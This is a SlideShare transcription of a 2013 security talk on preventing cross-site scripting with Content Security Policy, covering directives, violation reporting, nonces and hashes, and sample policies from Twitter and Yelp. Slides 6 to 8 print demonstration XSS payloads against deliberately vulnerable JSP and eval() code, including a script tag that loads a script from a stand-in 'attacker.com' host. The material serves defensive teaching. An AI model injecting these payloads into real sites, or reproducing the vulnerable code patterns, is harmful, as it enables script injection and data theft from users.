SlideShare a Scribd company logo

Preventing XSS with Content Security Policy

K
Ksenia Peguero

Preventing XSS with Content Security Policy

Software
1 of 22
Download to read offline
1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. KSENIA DMITRIEVA Preventing XSS with Content Security Policy (CSP)
2 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Introduction Who am I? • Senior Security Consultant @Cigital • @KseniaDmitrieva • Ballroom dancer
3 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy (CSP) Agenda Questions to answer today: • Why do we need CSP? • What is CSP? • How is the policy configured and enforced? • How is CSP applied to existing web applications? • What improvements is CSP 1.1 bringing? • More questions?
4 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
5 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
6 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=<script>alert('xss');</script> <% String search_word = "<script>alert('xss');</script>"; %> <p> Search results for <script>alert('xss');</script></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting inline JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
7 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/> <% String search_word = "apple<script src="http://attacker.com/parse_page.js"/>"; %> <p> Search results for apple<script src="http://attacker.com/parse_page.js"/></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting a third-party JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
8 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS user_input="firstname'); alert('xss"; eval("display"+"('"+"firstname'); alert('xss"+"');"); Result: display('firstname'); alert('xss'); var function_name = "display"; var user_input = document.getElementById("parameter").value; eval(function_name+"('"+user_input+"');"); Result: display('firstname'); Injecting into eval() Vulnerable JavaScript Malicious Input JavaScript Result
9 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. What is Content Security Policy? CSP defines a list of resource directives: • script-src • connect-src • font-src • frame-src • style-src • img-src • media-src • object-src First Name Last Name Address Email Submit third-party <iframe src= "http://attacker.com/ hello.htm"> </iframe> <script> Inline JavaScript </script> <script src="https://malicioussites.com/spam.js"/> <script src="https://jquery.org/libraries/jquery.js" /> Content Security Policy: • Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval(). • Imposes restrictions on resources based on their origin.
10 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Sample CSP Policies Policy is sent by the server as an HTTP header: Content-Security-Policy: script-src 'self' https://apis.google.com Any malicious inline scripts or scripts hosted elsewhere will not be executed. Can a page with the following policy load an image from http://www.bbc.com/? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src * Can a page with the following policy load a script from http://attacker.com? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; fonts-src https://themes.googleusercontent.com X Can a page with the following policy load a CSS from http://wordpress.org? Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none' Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
11 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting Report violations of the policy to the server: report-uri directive Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php; { "csp-report": { "document-uri": "http://example.com/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "script-src 'self' https://apis.google.com", "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php" } } Sample reported JSON: Different browsers format reports differently!
12 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting and Enforcing • Content-Security-Policy header with report-uri enforces the policy • Content-Security-Policy-Report-Only header reports policy violations, but does not enforce the policy Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php • Use both headers: one to enforce the old policy and another to test out the new policy Content-Security-Policy: default-src 'self' *.google.com; Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
13 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); Without CSP With CSP Page.html mypage.js <!doctype html> <html> <head> <title>My Page</title> <script type="text/javascript"> function repeated() { ... } function clickHandler(element) { setTimeout("console.log('lapse'); repeated()", 1000); } function init() { ... } </script> </head> <body onload="init();"> <button onclick="clickHandler(this)"> Click me! </button> </body> </html>
14 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); With CSP Page.html mypage.js
15 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Adoption http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/ CSP 1.0 is supported by the following browsers: • Internet Explorer – partial support, requires a prefix: X-Content-Security-Policy • Firefox desktop 23 Firefox for Android 30 Chrome desktop 25 Chrome for Android 35 Safari desktop 7 iOS Safari 7 Opera desktop 22 • Opera Mini – no support CSP adoption rate is slow. Most of the CSP policies use unsafe directives: unsafe-eval, unsafe-inline.
16 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Twitter uses CSP on all their services (January 2015). Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe- eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D %3D%3D%3D&ro=false; Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
17 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Yelp uses CSP on www.yelp.com (January 2015). Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
18 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy 1.1 Using unsafe-eval and unsafe-inline is equal to turning the CSP off! CSP 1.1 (or level 2) addresses the issue of broken policies: • nonce-source directive • hash-source directive • policies in the <meta> tags CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014 CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30 <meta name="content-security-policy" content="script-src 'self'"/>
19 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Nonce Directive • Add a nonce attribute to every inline script in the page <script nonce="ZDU4eHjBDQ"> function onButtonClick() … </script> • Add the nonce directive to the script-src policy • Set a new nonce each time the page is requested • Do not automatically add a nonce to every JavaScript in the response • Add a nonce to inline JavaScript in the view template Content-Security-Policy: script-src "nonce=ZDU4eHjBDQ" 'self'
20 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Hash-source Directive Will the nonce directive prevent DOM-based XSS in dynamically generated JavaScript? <script> function onButtonClick() … </script> Solution: mark every inline JavaScript with a hash! • Directive 'hash-source' sends a hash of each inline script in the response • The browser hashes every inline JavaScript and compares the hashes Hash the script and add a Base64-encoded value to the CSP header: Content-Security-Policy: default-src 'self'; script-src 'sha256- MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJ lYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5 NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ==' X
21 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Q&A Resources: • W3C Standard for CSP 1.1 http://www.w3.org/TR/CSP11/ • CSP Reference http://content-security-policy.com/ • An Introduction to CSP by Mike West http://www.html5rocks.com/en/tutorials/security/conten t-security-policy/ • Making CSP Work for You by Mark Goodwin https://www.youtube.com/watch?v=F7eCP08nacI&t=2h1 4m16s • Automatic XSS protection with CSP by Neil Matatall https://blog.matatall.com/2013/09/automatic-xss- protection-with-csp-no-changes-required/ • Generating Content-Security-Policies, the easy way http://c0nrad.io/blog/csp.html
22 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. @KseniaDmitrieva kdmitrieva@cigital.com

Recommended

W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
 
Content security policy
Content security policyContent security policy
Content security policy
Ronan Dunne, CEH, SSCP
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Austin Gil
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
Ismael Goncalves
 
Http security response headers
Http security response headers Http security response headers
Http security response headers
mohammadhosseinrouha
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 

Recommended

W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
 
Content security policy
Content security policyContent security policy
Content security policy
Ronan Dunne, CEH, SSCP
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Austin Gil
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
Ismael Goncalves
 
Http security response headers
Http security response headers Http security response headers
Http security response headers
mohammadhosseinrouha
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
Omer Meshar
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
hamzajawad10
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
42Crunch
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam
 
CSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive DesignCSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive Design
Zoe Gillenwater
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Web application security
Web application securityWeb application security
Web application security
Akhil Raj
 
Synopsys jul1411
Synopsys jul1411Synopsys jul1411
Synopsys jul1411
Samsung Electronics Egypt
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Ryan LaBouve
 

More Related Content

What's hot

OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
42Crunch
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 

What's hot (20)

Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
Web application security
Web application securityWeb application security
Web application security
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
CSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive DesignCSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive Design
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web application security
Web application securityWeb application security
Web application security
 

Viewers also liked

DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
Amazon Web Services
 
BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity ModelBSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
Cigital
 

Viewers also liked (20)

Synopsys jul1411
Synopsys jul1411Synopsys jul1411
Synopsys jul1411
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Surfer en toute legalite sur le net
Surfer en toute legalite sur le netSurfer en toute legalite sur le net
Surfer en toute legalite sur le net
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
AppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the UglyAppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the Ugly
 
AppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSPAppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSP
 
Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your WebappGetting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
 
Security HTTP Headers
Security HTTP HeadersSecurity HTTP Headers
Security HTTP Headers
 
BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity ModelBSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
 
SYNOPSIS WRITING
SYNOPSIS WRITINGSYNOPSIS WRITING
SYNOPSIS WRITING
 
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
 
Intervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchandsIntervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchands
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Similar to Preventing XSS with Content Security Policy

SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas KonradSBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Research
 
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
Christopher Schmitt
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
Christopher Schmitt
 
Using AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3MUsing AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3M
Casey Lee
 
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3MDEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
Amazon Web Services
 
Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2
Salesforce Developers
 
Integrating Application Security into a Software Development Process
Integrating Application Security into a Software Development ProcessIntegrating Application Security into a Software Development Process
Integrating Application Security into a Software Development Process
Achim D. Brucker
 
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
Jollen Chen
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 

Similar to Preventing XSS with Content Security Policy (20)

Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
 
Web Security - CSP & Web Cryptography
Web Security - CSP & Web CryptographyWeb Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
 
How to React to JavaScript Insecurity
How to React to JavaScript InsecurityHow to React to JavaScript Insecurity
How to React to JavaScript Insecurity
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas KonradSBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
 
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
 
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design
 
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
 
The importance of normalizing your security data to ECS
The importance of normalizing your security data to ECSThe importance of normalizing your security data to ECS
The importance of normalizing your security data to ECS
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
 
Using AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3MUsing AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3M
 
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3MDEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
 
Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014
 
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analystsMeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
 
Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2
 
Integrating Application Security into a Software Development Process
Integrating Application Security into a Software Development ProcessIntegrating Application Security into a Software Development Process
Integrating Application Security into a Software Development Process
 
Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJS
 
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 

Recently uploaded

%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
masabamasaba
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
Juha-Pekka Tolvanen
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
masabamasaba
 

Recently uploaded (20)

WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
